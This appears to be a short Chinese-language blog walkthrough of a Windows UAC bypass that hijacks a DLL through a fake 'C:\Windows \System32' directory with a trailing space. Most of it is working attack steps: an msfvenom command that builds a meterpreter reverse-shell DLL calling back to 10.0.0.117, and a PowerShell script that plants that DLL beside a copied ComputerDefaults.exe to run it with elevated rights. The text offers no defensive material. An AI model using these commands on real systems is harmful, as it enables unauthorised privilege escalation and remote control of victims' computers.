enter description here

在C:\Windows\System32目录中并且AutoElevate为True的60个二进制文件中, 总共有13个可以用于带有Mocking可信目录的Hijacking DLL。
enter description here
以下可以看到劫持的DLL

enter description here

以下为原理图:
enter description here
msf生成dll 并开启MSF监听

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.0.0.117 lport=444 -f dll -o comctl32.dll

劫持DLL并提权
enter description here

1
2
3
4
5
6
7
8
$base = "amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_e4da93291059d8fb"
[ System.io.directory]::CreateDirectory("\\?\\c:\\Windows \\")
[ System.io.directory]:: CreateDirectory("C:\\Windows \\System32")
[ System.io.file]::Copy( "C:\Windows\System32\ComputerDefaults.exe","C:\Windows \System32\ComputerDefaults.exe" )
[ System.io.directory]::CreateDirectory( "C:\\Windows \\System32\\ComputerDefaults.exe.Local" )
[ System.io.directory]::CreateDirectory( "C:\\Windows \\System32\\ComputerDefaults.exe.Local\\$base" )
[ System.io.file]::Copy( "C:\Users\demon\Desktop\comctl32.dll", "c:\\Windows \\System32\\ComputerDefaults.exe.Local\\$base\comctl32.dll")
Start-Process "C:\Windows \System32\ComputerDefaults.exe"

https://www.elladodelmal.com/2018/11/mocking-trusted-directory-uac-bypass-en.html
https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e